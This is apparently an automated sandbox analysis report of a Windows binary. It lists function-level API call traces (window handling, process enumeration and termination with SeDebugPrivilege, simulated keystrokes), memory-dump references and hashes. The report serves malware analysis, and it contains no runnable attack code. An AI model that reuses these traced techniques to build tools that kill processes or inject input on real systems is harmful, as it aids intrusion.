                                                                                                                                                                    • Part of subcall function 001E49CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,001E4954,00000000), ref: 001E4A23
                                                                                                                                                                  • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,001FB85B), ref: 001FB926
                                                                                                                                                                  • KillTimer.USER32(00000000,?,00000000,?,?,?,?,001FB85B,00000000,?,?,001FAF1E,?,?), ref: 001FB9BD
                                                                                                                                                                  • DestroyAcceleratorTable.USER32(00000000), ref: 0025E775
                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 0025E7EB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2402799130-0
                                                                                                                                                                  • Opcode ID: 481b2462963be482efe132bd2a8d01ca2a40e1d5682ead6fc0fc79f4f7b90269
                                                                                                                                                                  • Instruction ID: 42f8465200d3d64b8052f21d83c4205a587344b9ea49259fcc2e7c3f40fa5825
                                                                                                                                                                  • Opcode Fuzzy Hash: 481b2462963be482efe132bd2a8d01ca2a40e1d5682ead6fc0fc79f4f7b90269
                                                                                                                                                                  • Instruction Fuzzy Hash: 6461FE3451470ACFEB299F25E88CB35B7F5FF46326F114129E68686570CBB4A8A4CB40
                                                                                                                                                                  Function 0024B14A Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0024B204
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InvalidateRect
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 634782764-0
                                                                                                                                                                  • Opcode ID: ff6dcfe7c97a96157bcc2fc9b06ab53919616d2e024cb2f30eecb0300702f5c7
                                                                                                                                                                  • Instruction ID: 8b4b0a6f4be4132dc0b2c92219e492a9811ae4b0713e500f2374ee2f79764bf8
                                                                                                                                                                  • Opcode Fuzzy Hash: ff6dcfe7c97a96157bcc2fc9b06ab53919616d2e024cb2f30eecb0300702f5c7
                                                                                                                                                                  • Instruction Fuzzy Hash: 7751C730624209BFEF2A9F29DC99B9E3F65AB06724F204151FA19D61A1C7F1E9708B50
                                                                                                                                                                  Function 001FA599 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0025E9EA
                                                                                                                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0025EA0B
                                                                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0025EA20
                                                                                                                                                                  • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0025EA3D
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0025EA64
                                                                                                                                                                  • DestroyCursor.USER32(00000000), ref: 0025EA6F
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0025EA8C
                                                                                                                                                                  • DestroyCursor.USER32(00000000), ref: 0025EA97
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CursorDestroyExtractIconImageLoadMessageSend
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3992029641-0
                                                                                                                                                                  • Opcode ID: 36d105ef896b33a27a4974019523327da5618ef262fa5c05c00d76698f409833
                                                                                                                                                                  • Instruction ID: 0651e12d9e802ab7789c2b07a79dcf765eb1482d47be96cf6f7385c5c2b0e942
                                                                                                                                                                  • Opcode Fuzzy Hash: 36d105ef896b33a27a4974019523327da5618ef262fa5c05c00d76698f409833
                                                                                                                                                                  • Instruction Fuzzy Hash: EB518AB0610209EFDB28CF64DC85FAA77B4BF08764F114618FA4AD7290D7B4EDA08B50
                                                                                                                                                                  Function 001FF6B5 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0025E9A0,00000004,00000000,00000000), ref: 001FF737
                                                                                                                                                                  • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0025E9A0,00000004,00000000,00000000), ref: 001FF77E
                                                                                                                                                                  • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0025E9A0,00000004,00000000,00000000), ref: 0025EB55
                                                                                                                                                                  • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0025E9A0,00000004,00000000,00000000), ref: 0025EBC1
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ShowWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1268545403-0
                                                                                                                                                                  • Opcode ID: 6219360f48d00ea1e5735d6acaad7e15ad4ea91c1d345065219ff9fefa73a1e9
                                                                                                                                                                  • Instruction ID: e68bd36a87daa4575c42c5a03c8a012119287bee11ed6842b43c77019d27962d
                                                                                                                                                                  • Opcode Fuzzy Hash: 6219360f48d00ea1e5735d6acaad7e15ad4ea91c1d345065219ff9fefa73a1e9
                                                                                                                                                                  • Instruction Fuzzy Hash: 90412B316146C9DBDB3C6B28DCCC636BA957F45316F2A4A2DE24B82561C7F0A846C711
                                                                                                                                                                  Function 0021CDE6 Relevance: 13.6, APIs: 9, Instructions: 65sleepkeyboardwindowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0021E138: GetWindowThreadProcessId.USER32(?,00000000), ref: 0021E158
                                                                                                                                                                    • Part of subcall function 0021E138: GetCurrentThreadId.KERNEL32 ref: 0021E15F
                                                                                                                                                                    • Part of subcall function 0021E138: AttachThreadInput.USER32(00000000,?,0021CDFB,?,00000001), ref: 0021E166
                                                                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 0021CE06
                                                                                                                                                                  • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 0021CE23
                                                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 0021CE26
                                                                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 0021CE2F
                                                                                                                                                                  • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 0021CE4D
                                                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0021CE50
                                                                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 0021CE59
                                                                                                                                                                  • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 0021CE70
                                                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0021CE73
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2014098862-0
                                                                                                                                                                  • Opcode ID: ed76ea3d5beecc04b4e97815e10f2cc9f3f60fc3eb1e565f97c01bccf0a34266
                                                                                                                                                                  • Instruction ID: 5f5e6652e53ec2de2a00182af44af6e7134fa3cde92a0df852500e9633be4096
                                                                                                                                                                  • Opcode Fuzzy Hash: ed76ea3d5beecc04b4e97815e10f2cc9f3f60fc3eb1e565f97c01bccf0a34266
                                                                                                                                                                  • Instruction Fuzzy Hash: B71104B1A6061CBEFB102F60EC8EFAB7A6DDB1C754F210415F3446B0E0C9F26C509AA4
                                                                                                                                                                  Function 0023C604 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0021A857: CLSIDFromProgID.COMBASE ref: 0021A874
                                                                                                                                                                    • Part of subcall function 0021A857: ProgIDFromCLSID.COMBASE(?,00000000), ref: 0021A88F
                                                                                                                                                                    • Part of subcall function 0021A857: lstrcmpiW.KERNEL32(?,00000000), ref: 0021A89D
                                                                                                                                                                    • Part of subcall function 0021A857: CoTaskMemFree.COMBASE(00000000), ref: 0021A8AD
                                                                                                                                                                  • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0023C6AD
                                                                                                                                                                  • _memset.LIBCMT ref: 0023C6BA
                                                                                                                                                                  • _memset.LIBCMT ref: 0023C7D8
                                                                                                                                                                  • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000001), ref: 0023C804
                                                                                                                                                                  • CoTaskMemFree.COMBASE(?), ref: 0023C80F
                                                                                                                                                                  Strings
                                                                                                                                                                  • NULL Pointer assignment, xrefs: 0023C85D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                                                                  • String ID: NULL Pointer assignment
                                                                                                                                                                  • API String ID: 1300414916-2785691316
                                                                                                                                                                  • Opcode ID: f685a4b29ca18f96261d3be618a10b1456bab941eeaf883e4c29be5ef8235906
                                                                                                                                                                  • Instruction ID: d806e97bda1241b20aff92f46892d93a9250820ab1b7525238a1fdfdda4006ab
                                                                                                                                                                  • Opcode Fuzzy Hash: f685a4b29ca18f96261d3be618a10b1456bab941eeaf883e4c29be5ef8235906
                                                                                                                                                                  • Instruction Fuzzy Hash: 2E915BB1D10218ABDB11DFA5DC85EDEBBB9EF08710F20812AF915B7281DB705A55CFA0
                                                                                                                                                                  Function 00241AD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 163processCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00241B09
                                                                                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00241B17
                                                                                                                                                                  • __wsplitpath.LIBCMT ref: 00241B45
                                                                                                                                                                    • Part of subcall function 0020297D: __wsplitpath_helper.LIBCMT ref: 002029BD
                                                                                                                                                                  • _wcscat.LIBCMT ref: 00241B5A
                                                                                                                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 00241BD0
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00241BE2
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                                                                  • String ID: hE)
                                                                                                                                                                  • API String ID: 1380811348-1983471782
                                                                                                                                                                  • Opcode ID: f6bb859a3a62b4cde136d8c8ee4e1601cd5bc38482afd4c552fc410342403e70
                                                                                                                                                                  • Instruction ID: 37e2649c262f12d5d79eb1db3a4889daaee3f58f8dd5d899ba9ab464c9264965
                                                                                                                                                                  • Opcode Fuzzy Hash: f6bb859a3a62b4cde136d8c8ee4e1601cd5bc38482afd4c552fc410342403e70
                                                                                                                                                                  • Instruction Fuzzy Hash: B6519D71514705AFC310EF20C885EABB7ECEF88714F10491EF58997291EB70EA14CB92
                                                                                                                                                                  Function 00249882 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00249926
                                                                                                                                                                  • SendMessageW.USER32(?,00001036,00000000,?), ref: 0024993A
                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00249954
                                                                                                                                                                  • _wcscat.LIBCMT ref: 002499AF
                                                                                                                                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 002499C6
                                                                                                                                                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 002499F4
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$Window_wcscat
                                                                                                                                                                  • String ID: SysListView32
                                                                                                                                                                  • API String ID: 307300125-78025650
                                                                                                                                                                  • Opcode ID: 08c6146d8d3b3bd3873dd1bf631df9412cb25e57497c99b589115c00ea0c719d
                                                                                                                                                                  • Instruction ID: cc315a0e8b08f199e7a7669a7615af82cd0c1aa47792375778de98c5cbaad60a
                                                                                                                                                                  • Opcode Fuzzy Hash: 08c6146d8d3b3bd3873dd1bf631df9412cb25e57497c99b589115c00ea0c719d
                                                                                                                                                                  • Instruction Fuzzy Hash: 1A41C271A10309AFEF259F64C889FEF77A8EF09350F10442AF549A7291C6B19DA4CB60
                                                                                                                                                                  Function 00241620 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00226F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00226F7D
                                                                                                                                                                    • Part of subcall function 00226F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00226F8D
                                                                                                                                                                    • Part of subcall function 00226F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00227022
                                                                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0024168B
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0024169E
                                                                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 002416CA
                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00241746
                                                                                                                                                                  • GetLastError.KERNEL32(00000000), ref: 00241751
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00241786
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                  • String ID: SeDebugPrivilege
                                                                                                                                                                  • API String ID: 2533919879-2896544425
                                                                                                                                                                  • Opcode ID: ab9457cd18b8536d9aa2b5ee4521ef2cf0e53d35a112f8c02c3153865a60ec7d
                                                                                                                                                                  • Instruction ID: b5e8b2442628e6ed13b5c00193e6c84a3a2ba69f7497cdabca07d123f72e1413
                                                                                                                                                                  • Opcode Fuzzy Hash: ab9457cd18b8536d9aa2b5ee4521ef2cf0e53d35a112f8c02c3153865a60ec7d
                                                                                                                                                                  • Instruction Fuzzy Hash: FE41CD71A10205AFDB08EFA4D8A5FADB7A5AF58304F048048F9069F2D2DBB4D864CF41
                                                                                                                                                                  Function 00226237 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadIconW.USER32(00000000,00007F03), ref: 002262D6
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: IconLoad
                                                                                                                                                                  • String ID: blank$info$question$stop$warning
                                                                                                                                                                  • API String ID: 2457776203-404129466
                                                                                                                                                                  • Opcode ID: 7edad147d7dea14a891056301c1f53e5e6ca379e80a9828e111de0678e58fc92
                                                                                                                                                                  • Instruction ID: 83acd5eac19bb08209ef799ee4b417b99bd2cfbd6857565c922a38939f52c2dc
                                                                                                                                                                  • Opcode Fuzzy Hash: 7edad147d7dea14a891056301c1f53e5e6ca379e80a9828e111de0678e58fc92
                                                                                                                                                                  • Instruction Fuzzy Hash: 1711EE33228357FED7059E94AC4ADAA739C9F16324B10012AF901662C2EBE069714568
                                                                                                                                                                  Function 0022757B Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 00227595
                                                                                                                                                                  • LoadStringW.USER32(00000000), ref: 0022759C
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 002275B2
                                                                                                                                                                  • LoadStringW.USER32(00000000), ref: 002275B9
                                                                                                                                                                  • _wprintf.LIBCMT ref: 002275DF
                                                                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 002275FD
                                                                                                                                                                  Strings
                                                                                                                                                                  • %s (%d) : ==> %s: %s %s, xrefs: 002275DA
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                                                                  • String ID: %s (%d) : ==> %s: %s %s
